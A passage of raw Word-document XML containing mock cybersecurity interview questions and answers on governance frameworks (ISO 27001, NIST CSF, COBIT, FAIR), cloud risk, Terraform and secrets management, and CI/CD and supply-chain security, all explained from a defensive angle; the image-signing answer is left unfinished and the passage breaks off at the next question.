          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Shift-left security means finding and fixing security issues earlier in the development lifecycle. Examples include secure design reviews, SAST, dependency scanning, IaC scanning, secrets scanning, and policy checks in CI. It reduces late-stage surprises and makes secure delivery faster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do DevSecOps practices reduce risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DevSecOps reduces risk by automating security checks, making controls repeatable, and giving developers fast feedback. Examples include pipeline scanning, signed images, SBOMs, policy-as-code, automated tests, secure templates, and continuous monitoring. It turns security from a manual gate into an integrated engineering practice.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>-------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 30 - Governance and Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is ISO 27001?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ISO 27001 is an international standard for establishing, implementing, maintaining, and improving an Information Security Management System. It focuses on risk-based security governance, policies, controls, continual improvement, and evidence that information security is managed systematically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Explain the ISO 27001 Annex A controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Annex A provides a catalog of security controls covering areas such as organizational controls, people controls, physical controls, and technology controls. Examples include access control, asset management, cryptography, logging, supplier security, incident management, secure development, and business continuity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What is NIST Cybersecurity Framework?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The NIST Cybersecurity Framework is a risk-based framework used to manage cybersecurity risk. It helps organizations structure capabilities, assess maturity, and improve controls. It is practical because it maps well to cloud security, incident response, asset management, vulnerability management, and governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What are the five NIST functions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The five NIST CSF functions are Identify, Protect, Detect, Respond, and Recover. Identify covers assets and risks. Protect covers safeguards. Detect covers monitoring. Respond covers incident handling. Recover covers restoration and improvement after disruption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is COBIT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: COBIT is a governance and management framework for enterprise IT. It helps align technology goals with business objectives, define control objectives, assign accountability, and measure performance. It is often used in IT governance, audit, risk, and compliance functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What is the difference between ISO 27001 and NIST?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ISO 27001 is an international standard focused on establishing and certifying an Information Security Management System (ISMS) - a formal, auditable management process with a certification outcome. NIST (particularly the Cybersecurity Framework and 800-series publications) is a US-originated, more flexible set of guidelines and control catalogs that organizations can adopt without formal certification, often used as a practical technical reference even by organizations pursuing ISO 27001 certification for the management process itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is FAIR?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: FAIR stands for Factor Analysis of Information Risk. It is a quantitative risk analysis model that estimates risk in financial terms by analyzing loss event frequency and loss magnitude. It is useful when leadership needs risk decisions expressed as potential business or financial exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is an IT audit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An IT audit is an independent review of technology processes, systems, controls, and evidence to determine whether they meet policy, regulatory, security, and operational requirements. It may cover access management, change management, logging, backup, incident management, vendor risk, and SDLC controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What evidence is typically collected during audits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Evidence can include access review records, approval tickets, change logs, CI/CD runs, vulnerability reports, patch records, backup restore tests, incident reports, policy documents, architecture diagrams, monitoring alerts, audit logs, risk acceptances, and screenshots or exports from control systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you manage audit findings?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I validate the finding, understand root cause, agree severity, assign an owner, define remediation actions, set due dates, collect evidence, and track closure. If remediation is delayed, I document risk acceptance or exception approval. I also look for systemic issues beyond the individual finding.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>----------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 31 - Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What are cloud security risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud security risks include misconfigured storage, overprivileged IAM, exposed services, insecure networks, weak logging, leaked secrets, vulnerable images, unencrypted data, poor key management, and unclear shared responsibility. Many cloud incidents come from configuration and identity mistakes, so governance and automation are critical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Explain the Shared Responsibility Model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The Shared Responsibility Model divides security obligations between the cloud provider and the customer: the provider secures the underlying infrastructure (physical data centers, hypervisor, network fabric, and for managed services, the service itself), while the customer is responsible for securing what they configure and deploy on top of it (IAM, network configuration, data, application code, and OS-level security for unmanaged compute). The exact split shifts depending on the service model - IaaS puts more on the customer, SaaS puts more on the provider - so understanding where the line falls for each specific service you use is essential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What are the risks of public cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Key risks include misconfiguration (the leading cause of cloud breaches - public buckets, overly permissive IAM, exposed databases), vendor lock-in making migration difficult, shared-tenancy concerns for highly regulated workloads, loss of direct physical control over infrastructure, and the expanded attack surface from the sheer number of managed services and APIs available, each with its own security model to understand and configure correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How do you secure GCP projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I secure GCP projects with folder/project structure, least-privilege IAM, groups instead of direct user grants, org policies, restricted public IPs, VPC design, logging, Security Command Center, Cloud Asset Inventory, Secret Manager, KMS, budget alerts, labels, and CI/CD/IaC guardrails. I also enforce periodic access reviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are IAM best practices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Grant least privilege using predefined or custom roles scoped narrowly rather than broad basic roles, assign permissions to groups rather than individual users so access follows role changes automatically, prefer Workload Identity/short-lived credentials over long-lived service account keys, enable audit logging on all IAM changes, and review access periodically (using tools like IAM Recommender) to catch permission creep before it becomes a real exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What risks exist in Kubernetes clusters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common risks include overly permissive RBAC bindings, privileged or root containers expanding the blast radius of a compromise, missing NetworkPolicies allowing unrestricted lateral movement between pods, unpatched nodes or container images with known vulnerabilities, exposed Kubernetes API servers or dashboards without proper authentication, and secrets stored insecurely (plain Kubernetes Secrets without encryption or an external secret manager).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What are the risks of Terraform automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risks include a compromised or overly-permissioned CI/CD credential being able to apply destructive changes across the entire managed estate, state file exposure leaking secrets stored in plaintext within state, drift between state and reality causing an apply to make unintended changes, and a bad module or unreviewed plan being applied to production without adequate review, since Terraform's power to change infrastructure at scale cuts both ways.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you secure Terraform state files?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store state in a remote backend with encryption at rest and access restricted via IAM to only the CI/CD identities and individuals who genuinely need it, enable state locking to prevent concurrent corruption, and mark sensitive outputs/variables so they're at least redacted from CLI display even though they still exist in the state file itself. Avoid committing local state files to version control entirely, and audit access to the state backend the same way you would any sensitive credential store.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you approach secrets management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a centralized secret manager (Secret Manager, Vault) as the single source of truth rather than scattering secrets across environment variables, config files, and CI variables, and grant access via short-lived, identity-based authentication (Workload Identity, OIDC) rather than static keys wherever possible. Rotate secrets regularly, never commit them to version control, mask them from logs and CI output, and audit access to detect unusual retrieval patterns that might indicate compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What are common cloud misconfiguration risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common misconfigurations include publicly accessible storage buckets or databases, overly permissive firewall rules (0.0.0.0/0 on sensitive ports), IAM roles granted more broadly than needed, missing encryption on data at rest or in transit, disabled or unmonitored audit logging, and default credentials or settings left unchanged after resource creation - most of these are preventable with policy-as-code guardrails enforced automatically rather than relying on manual review to catch every instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 32 - Kubernetes and DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What are the risks of CI/CD pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risks include overly broad credentials granted to the pipeline (a compromised pipeline can deploy or exfiltrate data anywhere those credentials reach), unreviewed third-party actions/plugins that could be malicious or compromised, secrets leaking through build logs or artifacts, insufficient separation between environments allowing a change to unintentionally affect production, and a lack of approval gates letting a single compromised or careless commit reach production without review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you secure Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I secure Jenkins by enabling SSO/MFA, RBAC, credential store controls, plugin hygiene, isolated agents, network restrictions, audit logs, backup, CSRF protection, limited admin access, pipeline code review, secret masking, and regular patching. Jenkins should not have broad production credentials unless tightly controlled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What are the risks of GitHub Actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Key risks include using mutable action tags (@v1) that can be silently changed upstream to inject malicious code (mitigated by pinning to a commit SHA), overly broad `GITHUB_TOKEN` or secret permissions granted to workflows, third-party actions from unverified publishers with supply-chain risk, and workflows triggered by pull requests from forks potentially executing untrusted code with access to repository secrets if not carefully scoped with the right trigger and permission settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is supply chain security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Supply chain security protects the integrity of code, dependencies, build systems, artifacts, and deployment paths. It covers dependency scanning, SBOMs, provenance, signed commits or images, trusted builders, artifact promotion, and policies that prevent unverified artifacts from reaching production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is an SBOM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SBOM, or Software Bill of Materials, is an inventory of software components, dependencies, versions, and sometimes licenses. It helps teams understand exposure when a vulnerability is discovered and supports compliance, vulnerability management, and supply chain transparency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Explain image signing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Image Signing?</w:t>
        <w:br/>
        <w:t>Image Signing is the process of digitally signing a container image (Docker image) to verify:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is runtime security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
